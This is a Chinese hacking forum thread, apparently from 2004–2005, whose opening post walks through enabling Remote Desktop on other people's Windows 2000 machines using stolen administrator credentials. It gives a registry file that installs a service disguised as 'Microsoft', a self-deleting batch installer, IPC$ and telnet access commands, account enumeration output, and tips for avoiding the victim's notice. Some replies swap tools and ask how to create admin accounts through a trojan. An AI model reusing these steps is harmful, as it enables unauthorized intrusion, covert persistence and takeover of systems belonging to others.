|
作者: hackerjune [hackerjune] 论坛用户 | 登录 |
首先我们制作开启3389的工具 先把下面的注册表内容copy一份,另存为3389.reg注册表文件 注册表内容: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] "Enabled"="0" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "ShutdownWithoutLogon"="0" [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] "EnableAdminTSRemote"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "TSEnabled"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] "Start"=dword:00000002 [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] "Hotkey"="1" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] "Start"=dword:00000002 "ErrorControl"=dword:00000001 "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 "ObjectName"="LocalSystem" "Type"=dword:00000010 "Description"="Microsoft" "DisplayName"="Microsoft" 再把下面的内容保存为批处理文件3389.bat 安装批处理内容: copy termsrv.exe eventlog.exe regedit.exe /s 3389.reg del 3389.reg del 3389.exe del 3389.bat 用winrar制作成exe自解压缩包 61.188.***.*** user:administrato pass:空 先使用工具letmein判断其操作系统 letmein \\ip -all -d TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了 再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾 应该没有开启了 建立ipc连接 copy工具过去 net use \\ip\ipc$ "pass" /user:name copy file \\ip\admin$\system32 用opentelnet开对方的telnet opentelnet \\ip name pass 1 99 用telnet进入 进入到对方的winnt\system32\ 目录 解压缩3389.exe 运行安装批处理3389.bat 现在我们把对方重起一下,用reboot 我们用ping命令监视他的上线情况,等他下线,呵呵下了,又上来了,不慌连,3389等会才能好,对方的机器有点慢 看见了么,开启成功! 现在开始. 假设我们拿到了一个主机的管理员帐户和密码. 主机: 192.168.0.1 帐号: administrator 密码: 7788 2000系统安装在c:\winnt下 从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来 判断此主机是专业版还是服务器版,才能进入下一个环节. 我们可以先用对方所开帐户判断: c:\>letmein \\192.168.0.1 -all -d stating connecting to server ... Server local time is: 2002-1-13 10:19:22 Start get all users form server... -------------------------- Total = 5 -------------------------- num0= Administrator () num1= Guest () num2= IUSR_servername (Internet 来宾帐号 ) num3= IWAM_servername (启动 IIS 进程帐号) num4= TsInternetUser (TsInternetUser) -------------------------- Total = 5 -------------------------- 一般情况num2/3/4这三个帐户都是2000server默认开启的. 2000专业版默认是不开这些帐户的. 我们也可以扫描对方开放的端口进一步确认: 用扫描软件如:superscan3.exe扫描对方所开端口 判断对方是否开启25,3372等2000server默认开启的端口. 当然我们还可以使用一些工具,如:cmdinfo.zip 这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一 系列信息,一个图形界面,一个命令行. 通过返回的信息就可以很清楚的了解对方主机情况. 还有一些其他的方法来判断,如:从对方所开的服务来确定等, 从上面的判断准确率还算高,别的就不一一说明了. 如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开, 或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了. 现在我们要进入下一环节: 判断终端服务到底有没有安装? 你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊? 这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口? 1.终端服务termservice在"管理工具">>>"服务"中被禁用. 2.终端服务连接所需的RDP协议在"管理工具">>>"终端服务配置"中被停用连接. 3.终端服务默认连接端口3389被人为的改变.如何改变请看修改终端服务默认的3389端口(图文) 4.终端服务绑定的网络适配器不是外网的. 5.防火墙和端口过滤之类的问题. 6.....(还有我没想到的) 其实,我们遇到最多的情况就是以上5种情况. 现在开始判组件是否被安装. 先与远程主机连接,映射远程主机C盘为本地Z盘 net use z: \\192.168.0.1\c$ "7788" /user:"administrator" 命令成功完成。 然后转到Z盘,检查 Z:\Documents and Settings\All Users\「开始」菜单\程序\管理工具> 里是否有 "终端服务管理器"和"终端服务配置"的快捷方式文件 如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小) 我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实. 判断完毕,对方好像是没有安装终端服务组件,可以进入下一步: telnet登陆对方主机,准备安装服务组件. 在这里,我强烈建议使用2000自带的telnet服务端登陆, 有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.(呵呵~,个人理解啊!) 就算没有开,打开用完后再关掉就完了. .abu.写的最快速登录WIN2K TELNET 服务已经把这个方法介绍的非常详细, 而且他的办法(在本机建立同名,同密码帐户),让快速实现telnet登陆成为现实. 假如我们已开启对方23端口, telnet 192.168.0.1 输入用户名/密码 *=============================================================== 欢迎使用 Microsoft Telnet 服务器。 *=============================================================== C:\> \\成功进入!!!! 进入后,再次检查终端组件是否安装: c:\>query user 这个工具需要安装终端服务. 这样就进一步确定了组件没有被安装.如果返回: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >w1 console 0 运行中 . 2002-1-12 22:5 \\类似这样的信息,可能组件就已安装. 好!都清楚了,可以开始安装了. --------------------------------------------------- C:\>dir c:\sysoc.inf /s //检查INF文件的位置 c:\WINNT\inf 的目录 2000-01-10 20:00 3,770 sysoc.inf 1 个文件 3,770 字节 ----------------------------------------------------- C:\> dir c:\sysocmgr.* /s //检查组件安装程序 c:\WINNT\system32 的目录 2000-01-10 20:00 42,768 sysocmgr.exe 1 个文件 42,768 字节 ----------------------------------------------------- c:\>echo [Components] > c:\wawa c:\>echo TSEnable = on >> c:\wawa //这是建立无人参与的安装参数 c:\>type c:\wawa [Components] TSEnable = on //检查参数文件 ------------------------------------------------------ c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q ----------------------------------------------------- 这一条就是真正安装组件的命令. 以上这条命令没有加/R参数,主机在安装完后自动重起. 如若加了/R参数主机就不会重起. 如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时, 3389终端服务就已经开启.你就可以连上去了. 问题和建议: A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方 的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒. B 一次不行可以再试一次,在实际中很有作用. C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼, 而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议. |
地主 发表时间: 04-09-18 14:42 |
回复: hackerjune [hackerjune] 论坛用户 | 登录 |
没人顶啊!!!! |
B1层 发表时间: 04-09-19 09:11 |
回复: ehaier [ehaier] 论坛用户 | 登录 |
我顶,这么好的东东!适合我们菜菜的人用哦! |
B2层 发表时间: 04-09-19 10:01 |
回复: gueiji [gueiji] 论坛用户 | 登录 |
楼猪不知道在哪里找的一些垃圾文章 看的人云里雾里 |
B3层 发表时间: 04-09-19 11:04 |
回复: hackerjune [hackerjune] 论坛用户 | 登录 |
你个白痴,看不懂就别说! |
B4层 发表时间: 04-09-19 11:12 |
回复: gueiji [gueiji] 论坛用户 | 登录 |
我更你说我是懒得看 一些注册表上面的键值有什么好看的 我真是替你不值呀 不知道在哪里找的些东西没什么实用价值 |
B5层 发表时间: 04-09-19 11:46 |
回复: gueiji [gueiji] 论坛用户 | 登录 |
像这些东西都只能去功一下现在的一些还不知道漏洞为何物的外马 何况现在哪有这么好连接的漏洞 开3389的服务器已经不是那么容易能拿到管理员权限了 DSB |
B6层 发表时间: 04-09-19 11:50 |
回复: xiaoqing01 [xiaoqing01] 论坛用户 | 登录 |
楼上的家伙放尊重点!用注册表怎么了? |
B7层 发表时间: 04-09-19 13:50 |
回复: hackerjune [hackerjune] 论坛用户 | 登录 |
轨迹是个垃圾 自己没实用价值```` |
B8层 发表时间: 04-09-19 18:25 |
回复: zhong [zhong] 见习版主 | 登录 |
有用就大家用。。没用就丢到一边去。。没什么好超的 不过3389确实不是很好拿到手的 |
B9层 发表时间: 04-09-19 19:05 |
回复: hackerjune [hackerjune] 论坛用户 | 登录 |
有谁知道比较好的开3389的工具啊? |
B10层 发表时间: 04-10-03 09:44 |
回复: Amr [amr] 论坛用户 | 登录 |
3389.exe 3389 1 3389 0 |
B11层 发表时间: 04-10-03 09:45 |
回复: zhutoume [zhutoume] | 登录 |
就算是运用在老的漏洞,但是有时刚好别人的系统就有这个漏你也没办法,俗话说,学多点对自已没有坏处,修改注册表也是一种不错的方法,如果菜鸟级的连这个也看不懂那也太菜了吧!!建议放弃所谓"黑客"之路吧!声明,本人也是菜鸟级的,不是太菜,至少能看懂,总结! 不过学C中真是有点挫折,努力中.. ... [此贴被 猪头正版(zhutoume) 在 10月03日10时33分 编辑过] |
B12层 发表时间: 04-10-03 10:31 |
回复: hackerjune [hackerjune] 论坛用户 | 登录 |
这里的注册表是比较好的方法哦` |
B13层 发表时间: 04-10-03 10:32 |
回复: macheal007 [macheal007] 论坛用户 | 登录 |
用3389.bat批量开3389端 口!!! |
B14层 发表时间: 05-01-28 15:56 |
回复: sxflhh [sxflhh] 论坛用户 | 登录 |
我利用海洋进入了远程计算机。但我想在远程计算机里不重启的情况下开启3389端口。 在此之前再请教一下,怎么样利用海洋木马建立管理员。 |
B15层 发表时间: 05-01-29 00:11 |
回复: fly112 [fly112] | 登录 |
我有点看不懂了 |
B16层 发表时间: 05-01-29 15:02 |
回复: qkong [qkong] 论坛用户 | 登录 |
没必要这么麻烦啦。。象上面所说的是对方开放了SERVER服务。。 并且IPC$也没禁止。。更高兴的是还知道对方管理员帐号密码。。 说句实话现在有这样漏洞的主机并不多。。不说对方是一个网络管理员。。 只要稍微懂点计算机网络的。。应该都不会有这样的漏洞(除非他不想封)。。 就算楼主的假设都成立好了。。开放IPC$的主机想开终端也没必要这么麻烦。。 上面的兄弟已经提到一个3389.exe 先拿这个来说吧。。。windows2000 只要COPY过去运行了就可以开启终端。。 …… 别的工具我也就不一有介绍了。。大家自己去网上找找。。 简单的还有…… 知识是要靠自己寻找.再努力的结果。。 |
B17层 发表时间: 05-01-29 17:57 |
回复: lyplyp [lyplyp] 论坛用户 | 登录 |
顶~~~ |
B18层 发表时间: 05-01-29 18:32 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号